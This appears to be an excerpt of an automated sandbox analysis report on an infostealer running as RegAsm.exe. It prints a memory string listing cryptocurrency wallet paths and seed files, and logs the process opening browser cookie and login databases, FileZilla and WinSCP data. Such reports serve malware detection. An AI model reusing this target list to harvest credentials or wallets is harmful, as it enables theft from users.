                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                Source: RegAsm.exe, 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
